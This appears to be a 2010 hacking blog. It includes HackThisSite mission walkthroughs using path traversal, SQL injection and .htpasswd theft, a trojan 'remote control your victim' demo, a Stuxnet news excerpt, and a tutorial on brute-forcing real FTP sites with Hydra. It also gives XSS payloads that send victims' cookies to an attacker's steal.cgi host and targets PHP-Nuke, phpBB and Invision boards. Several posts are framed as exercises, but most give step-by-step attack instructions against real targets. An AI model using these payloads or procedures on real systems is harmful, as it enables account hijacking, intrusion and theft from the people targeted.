Friday, October 22, 2010

Hackthissite realistic mission 3

Open the page source.  Down the bottom of the source you will see that the hacker just renamed index.html to oldindex.html.

Then you just have to type in the url http://www.hackthissite.org/missions/realistic/3/oldindex.html to view the old page. View the source, and copy it all. Then you will have to Submit a poem, and this is the important part. If you simply type in the name of your poem,it will be saved in the current directory.You need to submit the source of the oldindex.html as index.html and also in the correct place.For that you need to go up one directory.This is accomplished by '../' , which is prefixed to the name of our file 'index.html'

Name of poem has to be "../index.html" for this to work. Then paste the code you copied into the textarea you are supposed to write a poem.



$4900.00The Cadaver Calculator - Find out how much your body is worth.

Created by OnePlusYou - Free Dating Site

Hackthissite Realistic mission 2

Analyse the source code of each page.You will se update.php there. It's at the very end of the page. Click on it, or just type the http://www.blogger.com/"%20http://www.hackthissite.org/missions/realistic/2/update.%20php".

View the page source again. This time you will see a form, with the action update2.php. You will try clicking without passwords, and you get "Invalid username/password".

Then click back, so you can type your username and password again. We use SQL injection.Use the username:" ' or 1=1 - " and the same password  and you are done!. SQL injection is a very outdated vulnerability and you will hardly find a web application vulnerable to it.

Hackthissite realistic mission 7

You will need to use John the ripper to crack the password.Let's start with the mission.The first thing to do is analyse the source code and also keep an eye on the URL.The URL in your browser will show you something like " showimages.php?file= " and then a filename.The php file is displaying the file whose name is being given as parameter.If you analysed the source carefully you must have found the admin folder.If you click on it you will get the opportunity to log in to the admin part of the page. Writing the wrong password will not help you though.

You will notice that the server is using HTTP authentication(used by apache servers).The folder in apache are secured by two files namely .htpasswd and .htconf - the password and configuration file.You need to get the hash in the password file which will then be cracked by JTR.Enough clue..eh?

Type this in the addressbar :" http://www.hackthissite.org/missions/realistic/7/showimages.php?file=images/admin/.htpasswd " and you will se a little square with to vertical lines. Right click on the left vertical line and then copy the link. In firefox, you can just click on properties, but I don't know about other browsers.

You will then have to paste this into a txt file. Time to bruteforce it using John The Ripper.

Save what you copied in the run directory of the john the ripper program. Lets say we save this file as pass.txt. You then have to open the command promt and direct yourself into the run directory. You will have to use the command:" john-386 --show pass.txt ". It will look something like this:


This was on a windows computer.

Thursday, October 21, 2010

Trojan attack demo - Remote control your victim's PC

You must be familiar with what a trojan is.A Trojan is similar to a virus but it can be more lethal in the way it gives the attacker complete control over the victim's PC.Usually trojans come in two parts - the client and the server.The server resides on the victim's PC and the client is used to connect to it and play mischief,create havoc and much more.The attacker can take snapshots of the victim's screen,install a keylogger which will send you all the keystrokes,reboot the system,crash the system,eject the cd-rom and much more.This tutorial will show you how the hacker accomplishes his task and how to protect yourself from it.

The first thing a hacker does is to install the server on the victim's pc.The hacker does this very cleverly.The server part of the trojan is bind with a small program with like a chess game for example.The victims is deluded into thinking that the game is harmless.He installs it,not knowing that a trojan is being installed along with it in the background.The next thing the hacker needs to know is the IP address of the victim which he will use to connect the client to server.

The following demo is for educational purposes only.

We take the example of a trojan named Aladino.Its available for free over.The hacker binds the server part of this trojan with say a game of chess,using a program called binder.The victim is deluded into thinking that it is a harmless program.He install it on his hard-disk.Once it is executed,it will wait for commands to be sent by the hacker.There are many commands available,for example

SCREEN_CAPTURE C:\\snapshot.bmp

This command will take a snapshot if the victims screen and store it in c:\\snapshot.Other commands can be seen after typing help at the command prompt.They are simple and self explanatory.

Tuesday, October 19, 2010

Stuxnet - The Marvellous Malware

Computerworld - The Stuxnet worm is a "groundbreaking" piece of malware so devious in its use of unpatched vulnerabilities, so sophisticated in its multipronged approach, that the security researchers who tore it apart believe it may be the work of state-backed professionals.

It's amazing, really, the resources that went into this worm," said Liam O Murchu, manager of operations with Symantec's security response team.

“With the forensics we now have it is evident and provable that Stuxnet is a directed sabotage attack involving heavy insider knowledge,” wrote Ralph Langner, the CEO of Langner Communications, on the company website.

“The attack combines an awful lot of skills - just think about the multiple 0day vulnerabilities, the stolen certificates etc. This was assembled by a highly qualified team of experts, involving some with specific control system expertise.”

“Based on a conditional check, original code for OB 35 is manipulated during the transmission. If the condition matches, Stuxnet injects Step7 code into OB 35 that is executed on the PLC every time that OB 35 is called,” Langner explained in a brief report.

Yet, the really interesting aspect to Langner’s research is the conclusion that the attack was designed to have a short shelf life.

“Therefore, the whole attack only makes sense within a very limited timeframe…So we can conclude that the planned time of attack isn't somewhen next year. I must assume that the attack did already take place. I am also assuming that it was successful,” Langner commented.






35%

Created by OnePlusYou - Free Dating Sites

Saturday, October 16, 2010

Friday, October 15, 2010

Brute force attack

In simple terms,Brute force attack is used to crack a password and/or login name of say an ftp website.Here you use a brute force attacker program (the one we are going to use is called Hydra),to carry out the attack.This program uses a wordlist which contains hundreds or maybe thousands of words which this program sends as password to the server.If it matches with the correct password,you get logged in,else you gota add more words to the list.Remember that hacking requires a lot of patience.

So first of all you need to download and install hydra-5.4.Google it.Its free and it doesn't have a graphical interface.You 'll have to use the command line.After you have downloaded it,you need to search for a wordlist.Search for 'wordlist.txt' on Google.It 'll be text file.Save it in your harddisk.Add more words or phone numbers to it if you want to.

The next thing to do is search for a vulnerable site.A site that allows anonymous login through ftp,can be vulnerable.Or if you know the admin login name you can brutefoce the site as demonstrated below.Lets say the admin login name is 'admin'.You can use a wordlist for admin names even.Open the command prompt and change to the directory where you downloaded hydra.Type the following

Hydra -l admin -P wordlist.txt -e ns -vV [ip address] ftp

where [ip address] is the IP address of the site.To know the ip address you can ping the site by typing the following at the cmd prompt

ping sitetobehacked.com

sitetobehacked is the name of the vulnerable site.You will see the ip address of the site.The wordlist should be in the same directory and if you wanna use a wordlist for username also,replace admin by a text file where you have saved the names.Back to our hydra program,after you type the above command,and hit enter,hydra will start bruteforcing the site and it will take few minutes depending on the length of your wordlist.As soon as the password matches with the correct password,the program will stop and you will see the real password.Use it to login to the site using ftp and then you can download and upload files to the server and view all confidential documents!

Thursday, October 14, 2010

I wanna be a hacker!

The tag of a 'hacker' fascinates most of the teens out there.And maybe the reason why you are reading this post is that you are also one of them.
To be considered as an elite hacker you need to have certain skills and more importantly,a very deep and sound understanding of computers,operating system,networking,programming and security.Well even i am not that good,but i know little things which i learned all by myself and i wanna share that with you guys so as to give you a push in the right direction to learning stuffs related to hacking.

A hacker is not always a criminal and I am not writing this post to encourage cyber- crime.

'So what do i need to learn to become a hacker?' This is the most common question asked by the newbies.Well you can hack your way through even without knowing any programming language or knowing the nitty-gritty of what you are doing.But then you will be called a 'script kiddy' and not a hacker.Script kiddies use ready-made programs or scripts to exploit vulnerabilities.But atleast it'll give you a start up.I 'll write about the tools that are frequently used by the script kiddies,in my next post.


But if you really wanna become a hacker,you need to learn a lot.The best programming language to learn is pearl.The next thing you need to do is install,learn and use ONLY linux.You can learn C along with it and start tinkering with OS.This way you 'll learn the internal functioning of the OS.The next thing to do is learn Visual Basic-easy and robust.And if you are windows lover then you better be happy hacking your system registry only.A little knowledge about HTML,PHP,SQL is always helpful.The more you know about them,the better hacker you will become.But in my posts i assume that you don't know any of them.


The best way to start with is 'Google hacking'.No we are not gonna hack Google.Google's search mechanism proves to be an indispensable tool for a hacker to find vulnerable sites and gathering valuable information.I'll cover Google hacking in detail in my next post.

 

Wednesday, October 13, 2010

XSS attack scenario and prevention

Cross site scripting(XSS) attack exploits bugs in the web application to steal cookies,credit card numbers and other sensitive information.For technically challenged ones , a bug is flaw in coding a program or application.The web application maybe a forum or any other place where the user can input data.
An attacker can also send fraudulent emails impersonating a bank or shopping site,for example,and steal  the user's cookies used by original site to authenticate him.A real life scenario is given below.
First of all ,the attacker finds that there is an XSS vulnerability in the web application software that the shopping website uses, he sends the victim and email, with the following HTML:

 <A
HREF="http://archives.cnn.com/2001/US/09/16/inv.binladen.denial/?tw=<
script>document.location.replace('http://freewebhost.com/ph33r/steal.cg
i?'+document.cookie);</script>">Check this Article Out! </a>
 

The user would of course click the link and they would be lead to the CNN News Article, but at the same time the attacker would of been able to also direct the user towards his specially crafted URL, he now has
the users cookie. Using the Firefox cookie editor the attacker copies and pastes the victims cookie and uses it for himself. The attacker now refreshes and page and has access to the victims
account, the victim is billed with everything the attacker chooses to
buy.

To find out the vulnerable sites ,like all script kiddies ,you can extensively use Google,which we call Google hacking.

EXPLOITS AND VULNERABILITIES 

PHP NUKE VULNERABILTIES AND EXPLOITS:

http://localhost/nuke73/modules.php?name=News&file=article&sid=1&option
box=['http://freewebhost.comht/ph33r/steal.cgi?'+document.cookie]

 
The above exploit can exploit a vulnerability in PHP Nuke, because
modules.php fails to sanitize user input, the vendor had bothered to
make sure that input did not contain malicious code, the attack could
not be possible.

PHPBB FORUM VULERABILITIES AND EXPLOITS:

http://localhost.com/phpBB2/login.php('http://freewebhost.com/ph33r/ste
al.cgi?' document.cookie)


The above exploit is for a HTTP Splitting vulnerability in phpBB, HTTP
Splitting is when someone injects there own information into the HTTP
Headers, again if the php software filtered the user input correctly it
would not be allowed to happen, user input should NEVER be trusted.

INVISION POWER BOARD:

http://[target]/index.php?act='><script>alert(document.cookie)</script>

The above is obviously just a proof of concept exploits, all it does is display a message
box. The above exploit is for a vulnerability in IPB that is allowed to
occur because IPB (Version < 2.03) failed to sanitize user input.

After looking at the above vulnerabilities you should be able to summarize that XSS
attacks can occur mainly because a vendor fails to sanitize user input in there program(s).